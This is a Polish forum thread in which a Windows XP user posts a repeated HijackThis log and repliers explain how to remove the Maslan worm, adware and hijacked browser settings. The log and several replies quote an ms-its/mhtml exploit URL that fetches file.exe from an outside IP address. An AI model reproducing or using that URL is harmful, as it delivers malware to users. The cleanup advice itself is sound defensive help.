przycinający się XP
czasami chodzi prawidłowo, jednak przewaźnie się przycina np:
kliknięcie prawym przyciskiem myszki np. w ikone "Mój komputer" i wybranie opcji "właściwości" czasami niedaje źdnego efektu, komputer reaguje dopiero za drugim razem(z innymi ikonami bywa podobnie, takźe z właściwością ekranu/pulpitu)
kliknięcie prawym przyciskiem myszy na pulpicie(lub w folderach) powoduje pojawienie się paska ale wszystko odbywa się niepłynnie, tzn. pasek zanim sie całkowicie pojawi takjakby zacina się kilkakrotnie, pojawia się stopniowo, w dodatku jeśli klikne prawym przyciskiem myszki i w czasie gdy pojawia się ten pasek będe przesuwał myszke to kursor na ekranie się przytnie(stanie na chwile) po czym przeskoczy dalej do prawidłowej pozycji(takiej o ile przesuwam myszke)
zdarza sie źe komputer przestaje reagować na myszke i klawiaturę, tzn. moge wciskać wszystko po kolei i niema źadnej reakcji a po chwili (kilka–kilkdziesiąt sekund) nagle się takjakby odwiesza i wykonuje wszystkie zadane wcześniej polecenia (naciśnięcia klawiszy i myszki), co dziwne w czasie tej sytuacji bez problemu mogę korzystać z niektórych uruchomionych programów (np. winamp chodzi prawidłowo,poprawnie reaguje na myszke i klawiature bez źadnych opóźnień)
mam Celerona 2Gh, płyta Shuttle AV49P(N), DDR 256Mb/400Mhz, HDD Seagate 80gb, CD–RW LG, grafika ATI Radeon 9200, DVB Vision Plus, sieciówka Planet.
poniźej log z Hijacka, co moge z tamtąd powywalać?
Logfile of HijackThis v1.99.0
Scan saved at 10:51:14, on 2004–12–22
Platform: Windows XP Dodatek SP. 1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)
Running processes:
C:WINDOWSSystem32smss.exe
C:WINDOWSsystem32winlogon.exe
C:WINDOWSsystem32services.exe
C:WINDOWSsystem32lsass.exe
C:WINDOWSSystem32Ati2evxx.exe
C:WINDOWSsystem32svchost.exe
C:WINDOWSSystem32svchost.exe
C:WINDOWSsystem32Ati2evxx.exe
C:WINDOWSExplorer.EXE
C:WINDOWSsystem32LEXBCES.EXE
C:WINDOWSsystem32spoolsv.exe
C:WINDOWSsystem32LEXPPS.EXE
C:WINDOWSSystem32\___synmgr.exe
C:Program FilesICCard Reader Driver v1.9eDisk_Monitor.exe
C:Program FilesATI TechnologiesATI Control Panelatiptaxx.exe
C:PROGRA~1A4TechMouseAmoumain.exe
C:Program FilesGadu–Gadugg.exe
C:Program FilesGirder3Girder.exe
C:WINDOWSSystem32wuauclt.exe
C:Program FilesInternet Exploreriexplore.exe
C:Documents and SettingsjaMoje dokumenty ewHijackThis.exe
R1 – HKCUSoftwareMicrosoftInternet ExplorerMain,Search Bar = http://best–search.cc/search.php?v=6&aff=7285502
R1 – HKCUSoftwareMicrosoftInternet ExplorerMain,Search Page = http://best–search.cc/index.php?v=6&aff=7285502
R0 – HKCUSoftwareMicrosoftInternet ExplorerMain,Start Page = http://onet.pl/
R1 – HKCUSoftwareMicrosoftWindowsCurrentVersionInternet Settings,ProxyOverride = *hot–searches.com*;*lender–search.com*
R0 – HKCUSoftwareMicrosoftInternet ExplorerToolbar,LinksFolderName = Łącza
O1 – Hosts file is located at: C:WINDOWS sdbhosts
O1 – Hosts: 82.179.166.164 lender–search.com
O1 – Hosts: 82.179.166.165 hot–searches.com
O2 – BHO: AcroIEHlprObj Class – {06849E9F–C8D7–4D59–B87D–784B7D6BE0B3} – C:Program FilesAdobeAcrobat 5.0ReaderActiveXAcroIEHelper.ocx
O3 – Toolbar: &Radio – {8E718888–423F–11D2–876E–00A0C9082467} – C:WINDOWSSystem32msdxm.ocx
O4 – HKLM..Run: [Microsoft Windows DHCP] C:WINDOWSSystem32\___r.exe
O4 – HKLM..Run: [Microsoft Synchronization Manager] ___synmgr.exe
O4 – HKLM..Run: [NeroCheck] C:WINDOWSSystem32NeroCheck.exe
O4 – HKLM..Run: [Disk Monitor] C:Program FilesICCard Reader Driver v1.9eDisk_Monitor.exe
O4 – HKLM..Run: [ATIPTA] C:Program FilesATI TechnologiesATI Control Panelatiptaxx.exe
O4 – HKLM..Run: [WheelMouse] C:PROGRA~1A4TechMouseAmoumain.exe
O4 – HKLM..Run: [KernelFaultCheck] %systemroot%system32dumprep 0 –k
O4 – HKLM..RunServices: [Microsoft Synchronization Manager] ___synmgr.exe
O4 – HKCU..Run: [Microsoft Synchronization Manager] ___synmgr.exe
O4 – HKCU..Run: [Gadu–Gadu] "C:Program FilesGadu–Gadugg.exe" /tray
O4 – Startup: Girder3.lnk = C:Program FilesGirder3Girder.exe
O4 – Global Startup: Microsoft Office.lnk = C:Program FilesMicrosoft OfficeOfficeOSA9.EXE
O9 – Extra button: Related – {c95fe080–8f5d–11d2–a20b–00aa003c157a} – C:WINDOWSweb elated.htm
O9 – Extra 'Tools' menuitem: Show &Related Links – {c95fe080–8f5d–11d2–a20b–00aa003c157a} – C:WINDOWSweb elated.htm
O12 – Plugin for .spop: C:Program FilesInternet ExplorerPluginsNPDocBox.dll
O16 – DPF: {14A3221B–1678–1982–A355–7263B1281987} – ms–its:mhtml:file://C:foo.mht!http://82.179.166.130/e9xr2.chm::/file.exe
O18 – Filter: text/html – {4F7681E5–6CAF–478D–9CB8–4CA593BEE7FB} – C:WINDOWSSystem32xplugin.dll
O23 – Service: Ati HotKey Poller – Unknown – C:WINDOWSSystem32Ati2evxx.exe
O23 – Service: ATI Smart – Unknown – C:WINDOWSsystem32ati2sgag.exe
O23 – Service: LexBce Server – Lexmark International, Inc. – C:WINDOWSsystem32LEXBCES.EXE
kliknięcie prawym przyciskiem myszki np. w ikone "Mój komputer" i wybranie opcji "właściwości" czasami niedaje źdnego efektu, komputer reaguje dopiero za drugim razem(z innymi ikonami bywa podobnie, takźe z właściwością ekranu/pulpitu)
kliknięcie prawym przyciskiem myszy na pulpicie(lub w folderach) powoduje pojawienie się paska ale wszystko odbywa się niepłynnie, tzn. pasek zanim sie całkowicie pojawi takjakby zacina się kilkakrotnie, pojawia się stopniowo, w dodatku jeśli klikne prawym przyciskiem myszki i w czasie gdy pojawia się ten pasek będe przesuwał myszke to kursor na ekranie się przytnie(stanie na chwile) po czym przeskoczy dalej do prawidłowej pozycji(takiej o ile przesuwam myszke)
zdarza sie źe komputer przestaje reagować na myszke i klawiaturę, tzn. moge wciskać wszystko po kolei i niema źadnej reakcji a po chwili (kilka–kilkdziesiąt sekund) nagle się takjakby odwiesza i wykonuje wszystkie zadane wcześniej polecenia (naciśnięcia klawiszy i myszki), co dziwne w czasie tej sytuacji bez problemu mogę korzystać z niektórych uruchomionych programów (np. winamp chodzi prawidłowo,poprawnie reaguje na myszke i klawiature bez źadnych opóźnień)
mam Celerona 2Gh, płyta Shuttle AV49P(N), DDR 256Mb/400Mhz, HDD Seagate 80gb, CD–RW LG, grafika ATI Radeon 9200, DVB Vision Plus, sieciówka Planet.
poniźej log z Hijacka, co moge z tamtąd powywalać?
Logfile of HijackThis v1.99.0
Scan saved at 10:51:14, on 2004–12–22
Platform: Windows XP Dodatek SP. 1 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)
Running processes:
C:WINDOWSSystem32smss.exe
C:WINDOWSsystem32winlogon.exe
C:WINDOWSsystem32services.exe
C:WINDOWSsystem32lsass.exe
C:WINDOWSSystem32Ati2evxx.exe
C:WINDOWSsystem32svchost.exe
C:WINDOWSSystem32svchost.exe
C:WINDOWSsystem32Ati2evxx.exe
C:WINDOWSExplorer.EXE
C:WINDOWSsystem32LEXBCES.EXE
C:WINDOWSsystem32spoolsv.exe
C:WINDOWSsystem32LEXPPS.EXE
C:WINDOWSSystem32\___synmgr.exe
C:Program FilesICCard Reader Driver v1.9eDisk_Monitor.exe
C:Program FilesATI TechnologiesATI Control Panelatiptaxx.exe
C:PROGRA~1A4TechMouseAmoumain.exe
C:Program FilesGadu–Gadugg.exe
C:Program FilesGirder3Girder.exe
C:WINDOWSSystem32wuauclt.exe
C:Program FilesInternet Exploreriexplore.exe
C:Documents and SettingsjaMoje dokumenty ewHijackThis.exe
R1 – HKCUSoftwareMicrosoftInternet ExplorerMain,Search Bar = http://best–search.cc/search.php?v=6&aff=7285502
R1 – HKCUSoftwareMicrosoftInternet ExplorerMain,Search Page = http://best–search.cc/index.php?v=6&aff=7285502
R0 – HKCUSoftwareMicrosoftInternet ExplorerMain,Start Page = http://onet.pl/
R1 – HKCUSoftwareMicrosoftWindowsCurrentVersionInternet Settings,ProxyOverride = *hot–searches.com*;*lender–search.com*
R0 – HKCUSoftwareMicrosoftInternet ExplorerToolbar,LinksFolderName = Łącza
O1 – Hosts file is located at: C:WINDOWS sdbhosts
O1 – Hosts: 82.179.166.164 lender–search.com
O1 – Hosts: 82.179.166.165 hot–searches.com
O2 – BHO: AcroIEHlprObj Class – {06849E9F–C8D7–4D59–B87D–784B7D6BE0B3} – C:Program FilesAdobeAcrobat 5.0ReaderActiveXAcroIEHelper.ocx
O3 – Toolbar: &Radio – {8E718888–423F–11D2–876E–00A0C9082467} – C:WINDOWSSystem32msdxm.ocx
O4 – HKLM..Run: [Microsoft Windows DHCP] C:WINDOWSSystem32\___r.exe
O4 – HKLM..Run: [Microsoft Synchronization Manager] ___synmgr.exe
O4 – HKLM..Run: [NeroCheck] C:WINDOWSSystem32NeroCheck.exe
O4 – HKLM..Run: [Disk Monitor] C:Program FilesICCard Reader Driver v1.9eDisk_Monitor.exe
O4 – HKLM..Run: [ATIPTA] C:Program FilesATI TechnologiesATI Control Panelatiptaxx.exe
O4 – HKLM..Run: [WheelMouse] C:PROGRA~1A4TechMouseAmoumain.exe
O4 – HKLM..Run: [KernelFaultCheck] %systemroot%system32dumprep 0 –k
O4 – HKLM..RunServices: [Microsoft Synchronization Manager] ___synmgr.exe
O4 – HKCU..Run: [Microsoft Synchronization Manager] ___synmgr.exe
O4 – HKCU..Run: [Gadu–Gadu] "C:Program FilesGadu–Gadugg.exe" /tray
O4 – Startup: Girder3.lnk = C:Program FilesGirder3Girder.exe
O4 – Global Startup: Microsoft Office.lnk = C:Program FilesMicrosoft OfficeOfficeOSA9.EXE
O9 – Extra button: Related – {c95fe080–8f5d–11d2–a20b–00aa003c157a} – C:WINDOWSweb elated.htm
O9 – Extra 'Tools' menuitem: Show &Related Links – {c95fe080–8f5d–11d2–a20b–00aa003c157a} – C:WINDOWSweb elated.htm
O12 – Plugin for .spop: C:Program FilesInternet ExplorerPluginsNPDocBox.dll
O16 – DPF: {14A3221B–1678–1982–A355–7263B1281987} – ms–its:mhtml:file://C:foo.mht!http://82.179.166.130/e9xr2.chm::/file.exe
O18 – Filter: text/html – {4F7681E5–6CAF–478D–9CB8–4CA593BEE7FB} – C:WINDOWSSystem32xplugin.dll
O23 – Service: Ati HotKey Poller – Unknown – C:WINDOWSSystem32Ati2evxx.exe
O23 – Service: ATI Smart – Unknown – C:WINDOWSsystem32ati2sgag.exe
O23 – Service: LexBce Server – Lexmark International, Inc. – C:WINDOWSsystem32LEXBCES.EXE
Odpowiedzi: 8
teraz jest juz ok, plik sterownika grafiki był uszkodzony, tak to jest puścić kogoś do kompa
Nie przycina se bez powodu
Sprawdz procesy i ich wykorzystywanie CPU i pamieci
Defragmentacja
SWAP
tryb pracy dysku
zbedne usługi.....
Sprawdz procesy i ich wykorzystywanie CPU i pamieci
Defragmentacja
SWAP
tryb pracy dysku
zbedne usługi.....
a jednak nic z tego, pozbyłem sie wirusów mimo to system nadal sie przycina
wins:
Wins THX za Bloodhound.Exploit`a.6 :twisted:
:shock: Ze co :?: :shock:
Norton mu sie odezwal (F–Secure u mnie tez)
http://www.centrumxp.pl/forum/viewtopic.php?t=19887
O to chodzi;
O16 – DPF: {14A3221B–1678–1982–A355–7263B1281987} – ms–its:mhtml:file://C:foo.mht!http://82.179.166.130/e9xr2.chm::/file.exe
Wins THX za Bloodhound.Exploit`a.6 :twisted:
:shock: Ze co :?: :shock:
dzięki, juz wszystko ok, jakiego AV polecacie, który najmniej obciaźa system, jak dotąd uźywałem tylko MKS–Online
Wyłacz przywracanie systemu :
Zakończ procesy w Tasku :
___synmgr.exe
___r.exe
file.exe ( jeśli jest, bo w Tasku go nie widze )
Wyszukaj ( zaznaczając uktyte ) i usuń :
xplugin.dll, wyrejestruj z uźycia poleceniem regsvr32 /u *dll a potem papa
___synmgr.exe
___r.exe
file.exe
foo.mht!
related.htm
C:WINDOWS sdbhosts ( cały katalog )
Napraw za pomocą HJT ( Fix ) :
Włącz przywracanie systemu.
BTW, Nie masz AV to i masz problemy.
Moźesz takźe poszukać jakiegoś Remover`a Maslan`a, jak sobie nie dasz rady.
Poza tym OK.
Zapora ta systemowa włączona bo innej teź nie widze ?
Update :
Wins THX za Bloodhound.Exploit`a.6 :twisted:
Zakończ procesy w Tasku :
___synmgr.exe
___r.exe
file.exe ( jeśli jest, bo w Tasku go nie widze )
Wyszukaj ( zaznaczając uktyte ) i usuń :
xplugin.dll, wyrejestruj z uźycia poleceniem regsvr32 /u *dll a potem papa
___synmgr.exe
___r.exe
file.exe
foo.mht!
related.htm
C:WINDOWS sdbhosts ( cały katalog )
Napraw za pomocą HJT ( Fix ) :
R1 – HKCUSoftwareMicrosoftInternet ExplorerMain,Search Bar = http://best–search.cc/search.php?v=6&aff=7285502
R1 – HKCUSoftwareMicrosoftInternet ExplorerMain,Search Page = http://best–search.cc/index.php?v=6&aff=7285502
R1 – HKCUSoftwareMicrosoftWindowsCurrentVersionInternet Settings,ProxyOverride = *hot–searches.com*;*lender–search.com*
O1 – Hosts file is located at: C:WINDOWS sdbhosts
O1 – Hosts: 82.179.166.164 lender–search.com
O1 – Hosts: 82.179.166.165 hot–searches.com
O4 – HKLM..Run: [Microsoft Windows DHCP] C:WINDOWSSystem32\___r.exe ( Wariant robaka Maslan )
O4 – HKLM..Run: [Microsoft Synchronization Manager] ___synmgr.exe
O4 – HKLM..Run: [KernelFaultCheck] %systemroot%system32dumprep 0 –k ( zrzut pamięci )
O4 – HKLM..RunServices: [Microsoft Synchronization Manager] ___synmgr.exe ( j/w )
O4 – HKCU..Run: [Microsoft Synchronization Manager] ___synmgr.exe ( j/w )
O9 – Extra button: Related – {c95fe080–8f5d–11d2–a20b–00aa003c157a} – C:WINDOWSweb elated.htm
O9 – Extra 'Tools' menuitem: Show &Related Links – {c95fe080–8f5d–11d2–a20b–00aa003c157a} – C:WINDOWSweb elated.htm
O16 – DPF: {14A3221B–1678–1982–A355–7263B1281987} – ms–its~ ://C:foo.mht! http://82.179.166.130/e9xr2.–chm–::/file.exe
( Zmodyfikowałem string )
O18 – Filter: text/html – {4F7681E5–6CAF–478D–9CB8–4CA593BEE7FB} – C:WINDOWSSystem32xplugin.dll ( Adware.TMKSoft.XPlugin )
Włącz przywracanie systemu.
BTW, Nie masz AV to i masz problemy.
Moźesz takźe poszukać jakiegoś Remover`a Maslan`a, jak sobie nie dasz rady.
Poza tym OK.
Zapora ta systemowa włączona bo innej teź nie widze ?
Update :
Wins THX za Bloodhound.Exploit`a.6 :twisted:
Wylacz przywracanie, ubij w menedzerze zadan ponizej wymienione pliki exe i wyrzuc je z dysku jak i te fixnij wpisy w hijackthis
C:WINDOWSSystem32\___synmgr.exe
R1 – HKCUSoftwareMicrosoftInternet ExplorerMain,Search Bar = http://best–search.cc/search.php?v=6&aff=7285502
R1 – HKCUSoftwareMicrosoftInternet ExplorerMain,Search Page = http://best–search.cc/index.php?v=6&aff=7285502
R1 – HKCUSoftwareMicrosoftWindowsCurrentVersionInternet Settings,ProxyOverride = *hot–searches.com*;*lender–search.com*
O1 – Hosts file is located at: C:WINDOWS sdbhosts
O1 – Hosts: 82.179.166.164 lender–search.com
O1 – Hosts: 82.179.166.165 hot–searches.com
O4 – HKLM..Run: [Microsoft Windows DHCP] C:WINDOWSSystem32\___r.exe
O4 – HKLM..Run: [Microsoft Synchronization Manager] ___synmgr.exe
O4 – HKLM..Run: [KernelFaultCheck] %systemroot%system32dumprep 0 –k
O4 – HKLM..RunServices: [Microsoft Synchronization Manager] ___synmgr.exe
O4 – HKCU..Run: [Microsoft Synchronization Manager] ___synmgr.exe
O16 – DPF: {14A3221B–1678–1982–A355–7263B1281987} – ms–its:mhtml:file://C:foo.mht!http://82.179.166.130/e9xr2.chm::/file.exe
O18 – Filter: text/html – {4F7681E5–6CAF–478D–9CB8–4CA593BEE7FB} – C:WINDOWSSystem32xplugin.dll
Strona 1 / 1